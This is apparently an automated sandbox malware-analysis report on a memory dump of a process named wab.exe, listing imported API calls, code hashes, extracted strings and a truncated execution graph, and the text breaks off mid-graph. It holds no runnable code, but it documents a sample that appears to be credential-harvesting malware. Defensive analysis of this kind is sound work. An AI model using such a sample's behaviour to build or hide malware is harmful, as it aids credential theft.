                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040F6E2
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                            • strlen.MSVCRT ref: 0040F70D
                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00402FD7
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                            • strlen.MSVCRT ref: 00403006
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                            • String ID:
                                                            • API String ID: 764393265-0
                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Time$System$File$LocalSpecific
                                                            • String ID:
                                                            • API String ID: 979780441-0
                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.MSVCRT ref: 004134E0
                                                            • memcpy.MSVCRT ref: 004134F2
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$DialogHandleModuleParam
                                                            • String ID:
                                                            • API String ID: 1386444988-0
                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: InvalidateMessageRectSend
                                                            • String ID: d=E
                                                            • API String ID: 909852535-3703654223
                                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcschr.MSVCRT ref: 0040F79E
                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcschr$memcpywcslen
                                                            • String ID: "
                                                            • API String ID: 1983396471-123907689
                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                            • memcpy.MSVCRT ref: 0040C024
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FilePointer_memicmpmemcpy
                                                            • String ID: URL
                                                            • API String ID: 2108176848-3574463123
                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfmemcpy
                                                            • String ID: %2.2X
                                                            • API String ID: 2789212964-323797159
                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf
                                                            • String ID: %%-%d.%ds
                                                            • API String ID: 3988819677-2008345750
                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040E770
                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: MessageSendmemset
                                                            • String ID: F^@
                                                            • API String ID: 568519121-3652327722
                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PlacementWindowmemset
                                                            • String ID: WinPos
                                                            • API String ID: 4036792311-2823255486
                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                            • String ID: _lng.ini
                                                            • API String ID: 383090722-1948609170
                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                            • API String ID: 2773794195-880857682
                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcmp.MSVCRT ref: 00408AF3
                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                            • memcmp.MSVCRT ref: 00408B2B
                                                            • memcmp.MSVCRT ref: 00408B5C
                                                            • memcpy.MSVCRT ref: 00408B79
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID:
                                                            • API String ID: 231171946-0
                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcslen$wcscat$wcscpy
                                                            • String ID:
                                                            • API String ID: 1961120804-0
                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:2.4%
                                                            Dynamic/Decrypted Code Coverage:20.4%
                                                            Signature Coverage:0.5%
                                                            Total number of Nodes:846
                                                            Total number of Limit Nodes:16
                                                            execution_graph 34106 40fc40 70 API calls 34279 403640 21 API calls 34107 427fa4 42 API calls 34280 412e43 _endthreadex 34281 425115 76 API calls __fprintf_l 34282 43fe40 133 API calls 34110 425115 83 API calls __fprintf_l 34111 401445 memcpy memcpy DialogBoxParamA 34112 440c40 34 API calls 33238 444c4a 33257 444e38 33238->33257 33240 444c56 GetModuleHandleA 33241 444c68 __set_app_type __p__fmode __p__commode 33240->33241 33243 444cfa 33241->33243 33244 444d02 __setusermatherr 33243->33244 33245 444d0e 33243->33245 33244->33245 33258 444e22 _controlfp 33245->33258 33247 444d13 _initterm __getmainargs _initterm 33248 444d6a GetStartupInfoA 33247->33248 33250 444d9e GetModuleHandleA 33248->33250 33259 40cf44 33250->33259 33254 444dcf _cexit 33256 444e04 33254->33256 33255 444dc8 exit 33255->33254 33257->33240 33258->33247 33310 404a99 LoadLibraryA 33259->33310 33261 40cf60 33296 40cf64 33261->33296 33317 410d0e 33261->33317 33263 40cf6f 33321 40ccd7 ??2@YAPAXI 33263->33321 33265 40cf9b 33335 407cbc 33265->33335 33270 40cfc4 33353 409825 memset 33270->33353 33271 40cfd8 33358 4096f4 memset 33271->33358 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33277 407e30 _strcmpi 33280 40cfee 33277->33280 33382 407948 ??3@YAXPAX ??3@YAXPAX 33278->33382 33279->33278 33282 40cff2 RegDeleteKeyA 33280->33282 33283 40d007 EnumResourceTypesA 33280->33283 33282->33276 33285 40d047 33283->33285 33286 40d02f MessageBoxA 33283->33286 33284 40d1c4 33383 4080d4 ??3@YAXPAX 33284->33383 33288 40d0a0 CoInitialize 33285->33288 33363 40ce70 33285->33363 33286->33276 33380 40cc26 strncat memset RegisterClassA CreateWindowExA 33288->33380 33290 40d1cd 33384 407948 ??3@YAXPAX ??3@YAXPAX 33290->33384 33292 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33381 40c256 PostMessageA 33292->33381 33296->33254 33296->33255 33297 40d061 ??3@YAXPAX 33297->33278 33300 40d084 DeleteObject 33297->33300 33298 40d09e 33298->33288 33300->33278 33302 40d0f9 GetMessageA 33303 40d17b 33302->33303 33304 40d10d 33302->33304 33303->33276 33305 40d113 TranslateAccelerator 33304->33305 33307 40d145 IsDialogMessage 33304->33307 33308 40d139 IsDialogMessage 33304->33308 33305->33304 33306 40d16d GetMessageA 33305->33306 33306->33303 33306->33305 33307->33306 33309 40d157 TranslateMessage DispatchMessageA 33307->33309 33308->33306 33308->33307 33309->33306 33311 404ac4 GetProcAddress 33310->33311 33313 404ae8 33310->33313 33312 404add FreeLibrary 33311->33312 33314 404ad4 33311->33314 33312->33313 33315 404b13 33313->33315 33316 404afc MessageBoxA 33313->33316 33314->33312 33315->33261 33316->33261 33318 410d17 LoadLibraryA 33317->33318 33319 410d3c 33317->33319 33318->33319 33320 410d2b GetProcAddress 33318->33320 33319->33263 33320->33319 33322 40cd08 ??2@YAPAXI 33321->33322 33324 40cd26 33322->33324 33325 40cd2d 33322->33325 33392 404025 6 API calls 33324->33392 33327 40cd66 33325->33327 33328 40cd59 DeleteObject 33325->33328 33385 407088 33327->33385 33328->33327 33330 40cd6b 33388 4019b5 33330->33388 33333 4019b5 strncat 33334 40cdbf _mbscpy 33333->33334 33334->33265 33394 407948 ??3@YAXPAX ??3@YAXPAX 33335->33394 33337 407e04 33395 407a55 33337->33395 33340 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33347 407cf7 33340->33347 33341 407ddc 33341->33337 33407 407a1f 33341->33407 33343 407d7a ??3@YAXPAX 33343->33347 33347->33337 33347->33340 33347->33341 33347->33343 33398 40796e 7 API calls 33347->33398 33399 406f30 33347->33399 33349 407e30 33350 407e38 33349->33350 33351 407e57 33349->33351 33350->33351 33352 407e41 _strcmpi 33350->33352 33351->33270 33351->33271 33352->33350 33352->33351 33413 4097ff 33353->33413 33355 409854 33418 409731 33355->33418 33359 4097ff 3 API calls 33358->33359 33360 409723 33359->33360 33438 40966c 33360->33438 33452 4023b2 33363->33452 33369 40ced3 33541 40cdda 7 API calls 33369->33541 33370 40cece 33373 40cf3f 33370->33373 33493 40c3d0 memset GetModuleFileNameA strrchr 33370->33493 33373->33297 33373->33298 33376 40ceed 33520 40affa 33376->33520 33380->33292 33381->33302 33382->33284 33383->33290 33384->33296 33393 406fc7 memset _mbscpy 33385->33393 33387 40709f CreateFontIndirectA 33387->33330 33389 4019e1 33388->33389 33390 4019c2 strncat 33389->33390 33391 4019e5 memset LoadIconA 33389->33391 33390->33389 33391->33333 33392->33325 33393->33387 33394->33347 33396 407a65 33395->33396 33397 407a5b ??3@YAXPAX 33395->33397 33396->33349 33397->33396 33398->33347 33400 406f37 malloc 33399->33400 33401 406f7d 33399->33401 33403 406f73 33400->33403 33404 406f58 33400->33404 33401->33347 33403->33347 33405 406f6c ??3@YAXPAX 33404->33405 33406 406f5c memcpy 33404->33406 33405->33403 33406->33405 33408 407a38 33407->33408 33409 407a2d ??3@YAXPAX 33407->33409 33410 406f30 3 API calls 33408->33410 33411 407a43 33409->33411 33410->33411 33412 40796e 7 API calls 33411->33412 33412->33337 33429 406f96 GetModuleFileNameA 33413->33429 33415 409805 strrchr 33416 409814 33415->33416 33417 409817 _mbscat 33415->33417 33416->33417 33417->33355 33430 44b090 33418->33430 33423 40930c 3 API calls 33424 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33423->33424 33425 4097c5 LoadStringA 33424->33425 33428 4097db 33425->33428 33427 4097f3 33427->33276 33428->33425 33428->33427 33437 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33428->33437 33429->33415 33431 40973e _mbscpy _mbscpy 33430->33431 33432 40930c 33431->33432 33433 44b090 33432->33433 33434 409319 memset GetPrivateProfileStringA 33433->33434 33435 409374 33434->33435 33436 409364 WritePrivateProfileStringA 33434->33436 33435->33423 33436->33435 33437->33428 33448 406f81 GetFileAttributesA 33438->33448 33440 409675 33441 4096ee 33440->33441 33442 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33440->33442 33441->33277 33449 409278 GetPrivateProfileStringA 33442->33449 33444 4096c9 33450 409278 GetPrivateProfileStringA 33444->33450 33446 4096da 33451 409278 GetPrivateProfileStringA 33446->33451 33448->33440 33449->33444 33450->33446 33451->33441 33543 409c1c 33452->33543 33455 401e69 memset 33582 410dbb 33455->33582 33458 401ec2 33612 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33612 33459 401ed4 33597 406f81 GetFileAttributesA 33459->33597 33462 401ee6 strlen strlen 33464 401f15 33462->33464 33465 401f28 33462->33465 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33464->33613 33598 406f81 GetFileAttributesA 33465->33598 33468 401f35 33599 401c31 33468->33599 33471 401f75 33611 410a9c RegOpenKeyExA 33471->33611 33473 401c31 7 API calls 33473->33471 33474 401f91 33475 402187 33474->33475 33476 401f9c memset 33474->33476 33478 402195 ExpandEnvironmentStringsA 33475->33478 33479 4021a8 _strcmpi 33475->33479 33614 410b62 RegEnumKeyExA 33476->33614 33623 406f81 GetFileAttributesA 33478->33623 33479->33369 33479->33370 33481 40217e RegCloseKey 33481->33475 33482 401fd9 atoi 33483 